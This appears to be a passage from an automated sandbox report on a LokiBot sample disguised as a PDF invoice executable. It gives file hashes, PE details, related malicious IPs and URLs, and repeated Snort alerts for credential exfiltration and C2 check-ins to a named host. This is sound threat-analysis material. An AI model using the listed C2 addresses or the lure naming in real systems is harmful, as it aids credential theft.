                                    Detailed GCIOC2V.docGet hashmaliciousBrowse
                                    • 47.244.28.71
                                    Shipment Document BL,INV And Packing List Attached.exeGet hashmaliciousBrowse
                                    • 47.254.45.60
                                    https://bit.ly/33I4NhtGet hashmaliciousBrowse
                                    • 47.254.170.17
                                    https://bit.ly/3kUgQ0HGet hashmaliciousBrowse
                                    • 8.208.98.199
                                    JFCp0yRoUS1z.vbsGet hashmaliciousBrowse
                                    • 47.241.19.44
                                    http://nity.midlidl.com/indexGet hashmaliciousBrowse
                                    • 8.208.98.199
                                    kj3D6ZRVe22Y.vbsGet hashmaliciousBrowse
                                    • 47.241.19.44
                                    http://yjjv.midlidl.com/indexGet hashmaliciousBrowse
                                    • 8.208.98.199

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PI_Nov9071011998_ENTRUSTpdf.exe.log
                                    Process:C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1301
                                    Entropy (8bit):5.345637324625647
                                    Encrypted:false
                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz5
                                    MD5:6C42AAF2F2FABAD2BAB70543AE48CEDB
                                    SHA1:8552031F83C078FE1C035191A32BA43261A63DA9
                                    SHA-256:51D07DD061EA9665DA070B95A4AC2AC17E20524E30BF6A0DA8381C2AF29CA967
                                    SHA-512:014E89857B811765EA7AA0B030AB04A2DA1957571608C4512EC7662F6A4DCE8B0409626624DABC96CBFF079E7F0F4A916E6F49C789E00B6E46AD37C36C806DCA
                                    Malicious:true
                                    Reputation:moderate, very likely benign file
                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                    C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                    Process:C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview: 1
                                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                    Process:C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):55246
                                    Entropy (8bit):0.6022480823964415
                                    Encrypted:false
                                    SSDEEP:3:/lbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbOllbZ:u
                                    MD5:FE84C1E9A3AF7C1FC9D94AA3D80A9DD0
                                    SHA1:9C5E0DC4BF30024D7ED73DF7244D69B101ED157F
                                    SHA-256:72B1E26249BC9E873F2273D5588F3257153747152EA4040FF1C5F143A5BC01B5
                                    SHA-512:B9EA5054C531A185B8CF70959815067BD2504CBA817E5A5B2FD2E122BBE90B6FDDBC84925BE6A91CBBDF7DF474FB78A2EC8DF3C632E67534E0D2FD1BA93B0E2A
                                    Malicious:false
                                    Reputation:low
                                    Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user...................................

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.678064154183633
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:PI_Nov9071011998_ENTRUSTpdf.exe
                                    File size:359424
                                    MD5:2349d50a67c2ef85661ef2be6def2cc3
                                    SHA1:b0cfbb76140f37e483fa2ece9c790512e48f29d4
                                    SHA256:9e196418dece3402ea9627106e6e246d5186392f25f8ada694598168481fb0bf
                                    SHA512:1e6262dd441b0fb693099017110783f29dc0a51cbf3caf240d9e31d053c35ce780b1cca43b4aeb3ecf27da5f3ebbe67a6d0c2b2cb2022b2903e7e5d15131b27d
                                    SSDEEP:6144:iB5+r8OpllZciz0hFLXbfcruqroVjQghf3Hz5cM4lTwBB:iP+JPzC77PPjDvHz5n
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....y._..............0..r............... ........@.. ....................................@................................

                                    File Icon

                                    Icon Hash:00828e8e8686b000

                                    Static PE Info

                                    General

                                    Entrypoint:0x459096
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                    Time Stamp:0x5FC8791D [Thu Dec 3 05:35:25 2020 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:v4.0.30319
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x590440x4f.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x58c.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x5c0000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x5709c0x57200False0.826760334469data7.69094003544IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .rsrc0x5a0000x58c0x600False0.41796875data4.02687174462IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x5c0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_VERSION0x5a0900x2fcdata
                                    RT_MANIFEST0x5a39c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Version Infos

                                    DescriptionData
                                    Translation0x0000 0x04b0
                                    LegalCopyright
                                    Assembly Version2.0.0.0
                                    InternalNameTM.exe
                                    FileVersion2.0.0.0
                                    CompanyNameMicrosoft
                                    LegalTrademarks
                                    Comments
                                    ProductNamePet Pamonha
                                    ProductVersion2.0.0.0
                                    FileDescriptionPet Pamonha
                                    OriginalFilenameTM.exe

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    12/03/20-10:02:28.939498TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14970980192.168.2.347.91.79.163
                                    12/03/20-10:02:28.939498TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970980192.168.2.347.91.79.163
                                    12/03/20-10:02:28.939498TCP2025381ET TROJAN LokiBot Checkin4970980192.168.2.347.91.79.163
                                    12/03/20-10:02:28.939498TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24970980192.168.2.347.91.79.163
                                    12/03/20-10:02:28.939498TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4970980192.168.2.347.91.79.163
                                    12/03/20-10:02:29.293360TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971080192.168.2.347.91.79.163
                                    12/03/20-10:02:29.293360TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971080192.168.2.347.91.79.163
                                    12/03/20-10:02:29.293360TCP2025381ET TROJAN LokiBot Checkin4971080192.168.2.347.91.79.163
                                    12/03/20-10:02:29.293360TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971080192.168.2.347.91.79.163
                                    12/03/20-10:02:29.293360TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971080192.168.2.347.91.79.163
                                    12/03/20-10:02:29.611013TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971180192.168.2.347.91.79.163
                                    12/03/20-10:02:29.611013TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971180192.168.2.347.91.79.163
                                    12/03/20-10:02:29.611013TCP2025381ET TROJAN LokiBot Checkin4971180192.168.2.347.91.79.163
                                    12/03/20-10:02:29.611013TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971180192.168.2.347.91.79.163
                                    12/03/20-10:02:29.611013TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971180192.168.2.347.91.79.163
                                    12/03/20-10:02:29.858062TCP2025483ET TROJAN LokiBot Fake 404 Response804971147.91.79.163192.168.2.3
                                    12/03/20-10:02:30.152512TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971280192.168.2.347.91.79.163
                                    12/03/20-10:02:30.152512TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971280192.168.2.347.91.79.163
                                    12/03/20-10:02:30.152512TCP2025381ET TROJAN LokiBot Checkin4971280192.168.2.347.91.79.163
                                    12/03/20-10:02:30.152512TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971280192.168.2.347.91.79.163
                                    12/03/20-10:02:30.152512TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971280192.168.2.347.91.79.163
                                    12/03/20-10:02:30.214602TCP2025483ET TROJAN LokiBot Fake 404 Response804971247.91.79.163192.168.2.3
                                    12/03/20-10:02:30.776445TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971380192.168.2.347.91.79.163
                                    12/03/20-10:02:30.776445TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971380192.168.2.347.91.79.163
                                    12/03/20-10:02:30.776445TCP2025381ET TROJAN LokiBot Checkin4971380192.168.2.347.91.79.163
                                    12/03/20-10:02:30.776445TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971380192.168.2.347.91.79.163
                                    12/03/20-10:02:30.776445TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971380192.168.2.347.91.79.163
                                    12/03/20-10:02:30.840723TCP2025483ET TROJAN LokiBot Fake 404 Response804971347.91.79.163192.168.2.3
                                    12/03/20-10:02:31.118511TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971480192.168.2.347.91.79.163
                                    12/03/20-10:02:31.118511TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971480192.168.2.347.91.79.163
                                    12/03/20-10:02:31.118511TCP2025381ET TROJAN LokiBot Checkin4971480192.168.2.347.91.79.163
                                    12/03/20-10:02:31.118511TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971480192.168.2.347.91.79.163
                                    12/03/20-10:02:31.118511TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971480192.168.2.347.91.79.163
                                    12/03/20-10:02:31.264032TCP2025483ET TROJAN LokiBot Fake 404 Response804971447.91.79.163192.168.2.3
                                    12/03/20-10:02:31.524698TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971580192.168.2.347.91.79.163
                                    12/03/20-10:02:31.524698TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971580192.168.2.347.91.79.163
                                    12/03/20-10:02:31.524698TCP2025381ET TROJAN LokiBot Checkin4971580192.168.2.347.91.79.163
                                    12/03/20-10:02:31.524698TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971580192.168.2.347.91.79.163
                                    12/03/20-10:02:31.524698TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971580192.168.2.347.91.79.163
                                    12/03/20-10:02:31.584801TCP2025483ET TROJAN LokiBot Fake 404 Response804971547.91.79.163192.168.2.3
                                    12/03/20-10:02:31.827447TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971680192.168.2.347.91.79.163
                                    12/03/20-10:02:31.827447TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971680192.168.2.347.91.79.163
                                    12/03/20-10:02:31.827447TCP2025381ET TROJAN LokiBot Checkin4971680192.168.2.347.91.79.163
                                    12/03/20-10:02:31.827447TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971680192.168.2.347.91.79.163
                                    12/03/20-10:02:31.827447TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971680192.168.2.347.91.79.163
                                    12/03/20-10:02:31.881911TCP2025483ET TROJAN LokiBot Fake 404 Response804971647.91.79.163192.168.2.3
                                    12/03/20-10:02:32.151701TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971780192.168.2.347.91.79.163
                                    12/03/20-10:02:32.151701TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971780192.168.2.347.91.79.163
                                    12/03/20-10:02:32.151701TCP2025381ET TROJAN LokiBot Checkin4971780192.168.2.347.91.79.163
                                    12/03/20-10:02:32.151701TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971780192.168.2.347.91.79.163
                                    12/03/20-10:02:32.151701TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971780192.168.2.347.91.79.163
                                    12/03/20-10:02:32.212961TCP2025483ET TROJAN LokiBot Fake 404 Response804971747.91.79.163192.168.2.3
                                    12/03/20-10:02:32.492297TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971880192.168.2.347.91.79.163
                                    12/03/20-10:02:32.492297TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971880192.168.2.347.91.79.163
                                    12/03/20-10:02:32.492297TCP2025381ET TROJAN LokiBot Checkin4971880192.168.2.347.91.79.163
                                    12/03/20-10:02:32.492297TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971880192.168.2.347.91.79.163
                                    12/03/20-10:02:32.492297TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971880192.168.2.347.91.79.163
                                    12/03/20-10:02:32.556118TCP2025483ET TROJAN LokiBot Fake 404 Response804971847.91.79.163192.168.2.3
                                    12/03/20-10:02:32.765128TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971980192.168.2.347.91.79.163
                                    12/03/20-10:02:32.765128TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971980192.168.2.347.91.79.163
                                    12/03/20-10:02:32.765128TCP2025381ET TROJAN LokiBot Checkin4971980192.168.2.347.91.79.163
                                    12/03/20-10:02:32.765128TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971980192.168.2.347.91.79.163
                                    12/03/20-10:02:32.765128TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4971980192.168.2.347.91.79.163
                                    12/03/20-10:02:32.824420TCP2025483ET TROJAN LokiBot Fake 404 Response804971947.91.79.163192.168.2.3
                                    12/03/20-10:02:33.073392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972080192.168.2.347.91.79.163
                                    12/03/20-10:02:33.073392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.347.91.79.163
                                    12/03/20-10:02:33.073392TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.347.91.79.163
                                    12/03/20-10:02:33.073392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972080192.168.2.347.91.79.163
                                    12/03/20-10:02:33.073392TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972080192.168.2.347.91.79.163
                                    12/03/20-10:02:33.145655TCP2025483ET TROJAN LokiBot Fake 404 Response804972047.91.79.163192.168.2.3
                                    12/03/20-10:02:33.392093TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972180192.168.2.347.91.79.163
                                    12/03/20-10:02:33.392093TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.347.91.79.163
                                    12/03/20-10:02:33.392093TCP2025381ET TROJAN LokiBot Checkin4972180192.168.2.347.91.79.163
                                    12/03/20-10:02:33.392093TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972180192.168.2.347.91.79.163
                                    12/03/20-10:02:33.392093TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972180192.168.2.347.91.79.163
                                    12/03/20-10:02:33.455181TCP2025483ET TROJAN LokiBot Fake 404 Response804972147.91.79.163192.168.2.3
                                    12/03/20-10:02:33.703087TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972280192.168.2.347.91.79.163
                                    12/03/20-10:02:33.703087TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972280192.168.2.347.91.79.163
                                    12/03/20-10:02:33.703087TCP2025381ET TROJAN LokiBot Checkin4972280192.168.2.347.91.79.163
                                    12/03/20-10:02:33.703087TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972280192.168.2.347.91.79.163
                                    12/03/20-10:02:33.703087TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972280192.168.2.347.91.79.163
                                    12/03/20-10:02:33.764565TCP2025483ET TROJAN LokiBot Fake 404 Response804972247.91.79.163192.168.2.3
                                    12/03/20-10:02:34.056226TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972380192.168.2.347.91.79.163
                                    12/03/20-10:02:34.056226TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.347.91.79.163
                                    12/03/20-10:02:34.056226TCP2025381ET TROJAN LokiBot Checkin4972380192.168.2.347.91.79.163
                                    12/03/20-10:02:34.056226TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972380192.168.2.347.91.79.163
                                    12/03/20-10:02:34.056226TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972380192.168.2.347.91.79.163
                                    12/03/20-10:02:34.116974TCP2025483ET TROJAN LokiBot Fake 404 Response804972347.91.79.163192.168.2.3
                                    12/03/20-10:02:34.377230TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972480192.168.2.347.91.79.163
                                    12/03/20-10:02:34.377230TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.347.91.79.163
                                    12/03/20-10:02:34.377230TCP2025381ET TROJAN LokiBot Checkin4972480192.168.2.347.91.79.163
                                    12/03/20-10:02:34.377230TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972480192.168.2.347.91.79.163
                                    12/03/20-10:02:34.377230TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972480192.168.2.347.91.79.163
                                    12/03/20-10:02:34.437256TCP2025483ET TROJAN LokiBot Fake 404 Response804972447.91.79.163192.168.2.3
                                    12/03/20-10:02:34.827050TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972580192.168.2.347.91.79.163
                                    12/03/20-10:02:34.827050TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972580192.168.2.347.91.79.163
                                    12/03/20-10:02:34.827050TCP2025381ET TROJAN LokiBot Checkin4972580192.168.2.347.91.79.163
                                    12/03/20-10:02:34.827050TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972580192.168.2.347.91.79.163
                                    12/03/20-10:02:34.827050TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972580192.168.2.347.91.79.163
                                    12/03/20-10:02:34.971106TCP2025483ET TROJAN LokiBot Fake 404 Response804972547.91.79.163192.168.2.3
                                    12/03/20-10:02:35.243073TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972680192.168.2.347.91.79.163
                                    12/03/20-10:02:35.243073TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.347.91.79.163
                                    12/03/20-10:02:35.243073TCP2025381ET TROJAN LokiBot Checkin4972680192.168.2.347.91.79.163
                                    12/03/20-10:02:35.243073TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972680192.168.2.347.91.79.163
                                    12/03/20-10:02:35.243073TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972680192.168.2.347.91.79.163
                                    12/03/20-10:02:35.402597TCP2025483ET TROJAN LokiBot Fake 404 Response804972647.91.79.163192.168.2.3
                                    12/03/20-10:02:36.028626TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.347.91.79.163
                                    12/03/20-10:02:36.028626TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972780192.168.2.347.91.79.163
                                    12/03/20-10:02:36.028626TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.347.91.79.163
                                    12/03/20-10:02:36.028626TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972780192.168.2.347.91.79.163
                                    12/03/20-10:02:36.028626TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972780192.168.2.347.91.79.163
                                    12/03/20-10:02:36.086845TCP2025483ET TROJAN LokiBot Fake 404 Response804972747.91.79.163192.168.2.3
                                    12/03/20-10:02:36.313063TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972880192.168.2.347.91.79.163
                                    12/03/20-10:02:36.313063TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.347.91.79.163
                                    12/03/20-10:02:36.313063TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.347.91.79.163
                                    12/03/20-10:02:36.313063TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972880192.168.2.347.91.79.163
                                    12/03/20-10:02:36.313063TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972880192.168.2.347.91.79.163
                                    12/03/20-10:02:36.372263TCP2025483ET TROJAN LokiBot Fake 404 Response804972847.91.79.163192.168.2.3
                                    12/03/20-10:02:36.782392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972980192.168.2.347.91.79.163
                                    12/03/20-10:02:36.782392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.347.91.79.163
                                    12/03/20-10:02:36.782392TCP2025381ET TROJAN LokiBot Checkin4972980192.168.2.347.91.79.163
                                    12/03/20-10:02:36.782392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972980192.168.2.347.91.79.163
                                    12/03/20-10:02:36.782392TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4972980192.168.2.347.91.79.163
                                    12/03/20-10:02:36.844796TCP2025483ET TROJAN LokiBot Fake 404 Response804972947.91.79.163192.168.2.3
                                    12/03/20-10:02:38.586697TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973080192.168.2.347.91.79.163
                                    12/03/20-10:02:38.586697TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973080192.168.2.347.91.79.163
                                    12/03/20-10:02:38.586697TCP2025381ET TROJAN LokiBot Checkin4973080192.168.2.347.91.79.163
                                    12/03/20-10:02:38.586697TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973080192.168.2.347.91.79.163
                                    12/03/20-10:02:38.586697TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4973080192.168.2.347.91.79.163
                                    12/03/20-10:02:38.645182TCP2025483ET TROJAN LokiBot Fake 404 Response804973047.91.79.163192.168.2.3
                                    12/03/20-10:02:38.904768TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.347.91.79.163
                                    12/03/20-10:02:38.904768TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973180192.168.2.347.91.79.163
                                    12/03/20-10:02:38.904768TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.347.91.79.163
                                    12/03/20-10:02:38.904768TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.347.91.79.163
